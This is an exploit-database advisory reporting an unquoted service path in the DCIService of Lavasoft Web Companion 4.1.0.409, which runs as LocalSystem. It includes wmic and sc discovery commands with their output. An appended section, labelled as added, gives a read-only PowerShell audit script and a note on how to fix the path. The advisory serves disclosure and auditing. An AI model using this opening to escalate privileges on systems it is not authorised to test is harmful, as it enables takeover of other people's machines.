## https://sploitus.com/exploit?id=PACKETSTORM:171594
# Exploit Title: Lavasoft Web Companion 4.1.0.409 - 'DCIService' Unquoted Service Path  
# Author: P4p4 M4n3  
# Discovery Date: 25-11-2022  
# Vendor Homepage: https://webcompanion.com/en/  
# Version: 4.1.0.409  
# Tested on: Microsoft Windows Server 2019 Datacenter x64  
  
# Description:  
# Lavasoft Web Companion 4.1.0.409 installs DCIService as a service with an unquoted service path.  
# PoC: https://youtu.be/yb8AavCMbes  
  
# Discover the unquoted service path  
  
C:\Users\p4p4> wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """  
  
DCIService C:\Program Files (x86)\Lavasoft\Web Companion\Service\x64\DCIService.exe Auto   
  
  
C:\Users\p4p4> sc qc DCIService  
[SC] QueryServiceConfig réussite(s)  
  
SERVICE_NAME: DCIService  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : C:\Program Files (x86)\Lavasoft\Web Companion\Service\x64\DCIService.exe  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : DCIService  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem
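
Added example (not part of the original advisory or the vendor's code): a read-only PowerShell audit that performs the same discovery as the `wmic` one-liner above, but parses the executable out of each `PathName` so that environment variables and trailing arguments are handled. The function names and the `Example Vendor` sample paths are hypothetical.

```powershell
# Added example, not from the advisory. Read-only audit of service image paths.

function Get-ServiceExePath {
    # Executable portion of an unquoted PathName (environment variables
    # expanded); $null when the value is quoted or has no .exe image.
    param([Parameter(Mandatory)][string]$PathName)
    $p = [Environment]::ExpandEnvironmentVariables($PathName).Trim()
    if ($p.StartsWith('"')) { return $null }
    $m = [regex]::Match($p, '^(.+?\.exe)(?=\s|$)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return $null
}

function Test-UnquotedServicePath {
    # True when the unquoted executable path contains a space.
    param([Parameter(Mandatory)][string]$PathName)
    $exe = Get-ServiceExePath -PathName $PathName
    return ($null -ne $exe) -and $exe.Contains(' ')
}

function Get-UnquotedServicePath {
    # Live audit: every Win32 service on this host with an affected PathName.
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -and (Test-UnquotedServicePath $_.PathName) } |
        Select-Object Name, StartMode, StartName, PathName
}

# Constructed sample values; only the first is taken from the advisory output.
$samples = @(
    'C:\Program Files (x86)\Lavasoft\Web Companion\Service\x64\DCIService.exe',
    '"C:\Program Files\Example Vendor\agent.exe" --run',
    'C:\Windows\system32\svchost.exe -k netsvcs -p',
    '%ProgramFiles%\Example Vendor\agent.exe /service'
)
foreach ($s in $samples) {
    '{0,-5} {1}' -f (Test-UnquotedServicePath $s), $s
}

Get-UnquotedServicePath | Format-Table -AutoSize -Wrap
```

The script only reads service configuration and changes nothing. A flagged entry is corrected by enclosing the executable path in double quotes in the service's binary path, normally through a vendor update.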